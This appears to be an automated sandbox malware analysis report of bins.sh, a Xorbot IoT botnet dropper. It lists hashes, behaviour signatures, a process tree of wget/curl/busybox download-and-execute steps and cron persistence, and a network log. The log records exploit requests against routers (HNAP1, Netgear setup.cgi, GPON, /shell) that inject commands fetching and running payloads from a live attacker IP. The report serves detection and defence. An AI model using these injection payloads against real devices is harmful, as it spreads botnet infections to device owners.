Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
-
submitted
28/02/2025, 19:33 UTC
General
-
Target
bins.sh
-
Size
10KB
-
MD5
0d6abf13920f9568901114a1d17cdfd6
-
SHA1
8f51702b2844fafb5952fa36d21c2b47de532b5f
-
SHA256
7c0a391f5ce85b25149f47e7cdce3f47658ea8439a5d487d05833573f20ff9cb
-
SHA512
0e8c146bd5d415028be102875ebb16d2b898f3923252b11cfeb179fd58a8ef36a54772709f514d6297449e8fdb4246740084f9ed93dad9bdd675905cdf67b795
-
SSDEEP
192:RdZtmvfC3A3k3x3+3e3LjHkJpgL5d5l5uFpY90cva22sYaGiQa3vvLCLuLzm+v0q:RdZtmvfC3A3k3x3+3e3LjHkJpgLHzJ9p
Score
10/10
Malware Config
Signatures
-
Detects Xorbot 5 IoCs
-
Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
-
Xorbot family
-
Contacts a large (1748) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 5 IoCs
-
Renames itself 1 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 18 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- File and Directory Permissions Modification
-
-
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
-
-
/bin/rmrm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- File and Directory Permissions Modification
-
-
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
-
-
/bin/rmrm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- File and Directory Permissions Modification
-
-
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
-
-
/bin/rmrm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- File and Directory Permissions Modification
-
-
/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
-
-
/bin/rmrm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- File and Directory Permissions Modification
-
-
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- Renames itself
- Reads runtime system information
- System Network Configuration Discovery
-
/bin/shsh -c "crontab -l"3⤵
-
/usr/bin/crontabcrontab -l4⤵
-
-
-
/bin/shsh -c "crontab -"3⤵
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
-
-
-
-
/bin/rmrm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵
- System Network Configuration Discovery
-
Network
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240 -
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4GRemote address:37.44.238.88:80RequestGET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: conn.masjesu.zip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:15 GMT
Content-Type: application/octet-stream
Content-Length: 109733
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
ETag: "67c2022f-1aca5"
X-Cache-Status: MISS
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
GEThttp://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4GRemote address:37.44.238.88:80RequestGET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
Host: conn.masjesu.zip
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:16 GMT
Content-Type: application/octet-stream
Content-Length: 109733
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
ETag: "67c2022f-1aca5"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4GRemote address:37.44.238.88:80RequestGET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
Host: conn.masjesu.zip
User-Agent: Wget
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:16 GMT
Content-Type: application/octet-stream
Content-Length: 109733
Connection: close
Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
ETag: "67c2022f-1aca5"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzvRemote address:37.44.238.88:80RequestGET /bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: conn.masjesu.zip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:17 GMT
Content-Type: application/octet-stream
Content-Length: 120808
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
ETag: "67c20230-1d7e8"
X-Cache-Status: MISS
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzvRemote address:37.44.238.88:80RequestGET /bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv HTTP/1.1
Host: conn.masjesu.zip
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:18 GMT
Content-Type: application/octet-stream
Content-Length: 120808
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
ETag: "67c20230-1d7e8"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7ERemote address:37.44.238.88:80RequestGET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: conn.masjesu.zip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:22 GMT
Content-Type: application/octet-stream
Content-Length: 101654
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
ETag: "67c20230-18d16"
X-Cache-Status: MISS
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
GEThttp://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7ERemote address:37.44.238.88:80RequestGET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
Host: conn.masjesu.zip
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:28 GMT
Content-Type: application/octet-stream
Content-Length: 101654
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
ETag: "67c20230-18d16"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7ERemote address:37.44.238.88:80RequestGET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
Host: conn.masjesu.zip
User-Agent: Wget
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:28 GMT
Content-Type: application/octet-stream
Content-Length: 101654
Connection: close
Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
ETag: "67c20230-18d16"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAkiRemote address:37.44.238.88:80RequestGET /bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: conn.masjesu.zip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:29 GMT
Content-Type: application/octet-stream
Content-Length: 114267
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:33 GMT
ETag: "67c20231-1be5b"
X-Cache-Status: MISS
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
GEThttp://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAkiRemote address:37.44.238.88:80RequestGET /bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki HTTP/1.1
Host: conn.masjesu.zip
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:29 GMT
Content-Type: application/octet-stream
Content-Length: 114267
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:33 GMT
ETag: "67c20231-1be5b"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
GEThttp://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2UprRemote address:37.44.238.88:80RequestGET /bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr HTTP/1.1
User-Agent: Wget/1.18 (linux-gnueabihf)
Accept: */*
Accept-Encoding: identity
Host: conn.masjesu.zip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:34 GMT
Content-Type: application/octet-stream
Content-Length: 144869
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:34 GMT
ETag: "67c20232-235e5"
X-Cache-Status: MISS
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A37.44.238.88conn.masjesu.zipIN A216.126.231.240
-
GEThttp://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2UprRemote address:37.44.238.88:80RequestGET /bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr HTTP/1.1
Host: conn.masjesu.zip
User-Agent: curl/7.52.1
Accept: */*
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:35 GMT
Content-Type: application/octet-stream
Content-Length: 144869
Connection: keep-alive
Last-Modified: Fri, 28 Feb 2025 18:36:34 GMT
ETag: "67c20232-235e5"
X-Cache-Status: HIT
Accept-Ranges: bytes
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponse
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
GEThttp://37.44.238.88/.shellRemote address:37.44.238.88:80RequestGET /.shell HTTP/1.1
Host: 37.44.238.88
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 28 Feb 2025 19:33:42 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 208
Connection: close
server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1770&rtt_var=901&sent=3&recv=6&lost=0&retrans=0&sent_bytes=139&recv_bytes=571&delivery_rate=532352&cwnd=250&unsent_bytes=0&cid=2d0f9e4f6658bcf1&ts=49&x=0"
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AResponseconn.masjesu.zipIN A216.126.231.240conn.masjesu.zipIN A37.44.238.88
-
DNSconn.masjesu.zipRemote address:1.1.1.1:53Requestconn.masjesu.zipIN AAAAResponse
-
GEThttp://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRemote address:104.24.157.51:80RequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 104.24.157.51:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 403 Forbidden
Date: Fri, 28 Feb 2025 19:33:42 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9192d90e5b949415-LHR
-
POSThttp://104.24.157.51:80/HNAP1/Remote address:104.24.157.51:80RequestPOST /HNAP1/ HTTP/1.0
Host: 104.24.157.51:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.1 403 Forbidden
Date: Fri, 28 Feb 2025 19:33:42 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 16
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9192d90e5e9c63c5-LHR
-
GEThttp://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1Remote address:104.24.157.51:80RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 400 Bad Request
Date: Fri, 28 Feb 2025 19:33:42 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
Server: cloudflare
CF-RAY: 9192d90e5b7b9547-LHR
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/Remote address:104.24.157.51:80RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 403 Forbidden
Date: Fri, 28 Feb 2025 19:33:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 9192d90e6ca294ea-LHR
Content-Encoding: gzip
-
GEThttp://104.24.157.51:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1Remote address:104.24.157.51:8080RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 400 Bad Request
Date: Fri, 28 Feb 2025 19:33:43 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
Server: cloudflare
CF-RAY: 9192d911d9bf8ae0-LHR
-
POSThttp://127.0.0.1:8080/GponForm/diag_Form?images/Remote address:104.24.157.51:8080RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 403 Forbidden
Date: Fri, 28 Feb 2025 19:33:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 9192d911e8dff668-LHR
Content-Encoding: gzip
-
GEThttp://4.182.16.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 4.182.16.236:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 404 Not Found
Date: Fri, 28 Feb 2025 19:33:47 GMT
Content-Length: 0
Connection: keep-alive
Server: Kestrel
-
POSThttp://4.182.16.236:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 4.182.16.236:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
-
GEThttp://4.182.16.236:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 400 Bad Request
Date: Fri, 28 Feb 2025 19:33:47 GMT
Content-Length: 0
Connection: close
Server: Kestrel
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 404 Not Found
Date: Fri, 28 Feb 2025 19:33:47 GMT
Content-Length: 0
Connection: keep-alive
Server: Kestrel
-
DNSResponseHTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 28 Feb 2025 19:33:47 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
-
GEThttp://37.202.169.166:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.1 404 Not Found
CONNECTION: close
CONTENT-LENGTH: 48
Strict-Transport-Security: max-age=604800; includeSubDomains
X-XSS-Protection: 1;mode=block
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
CONTENT-TYPE: text/html
-
POSThttp://127.0.0.1:8080/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
GEThttp://104.130.219.14:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 104.130.219.14:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 302 Found
Date: Fri, 28 Feb 2025 19:34:01 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Location: https://www.astarna.com/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
Content-Length: 371
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
POSThttp://104.130.219.14:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 104.130.219.14:80
Content-Type: text/xml; charset="utf-8"
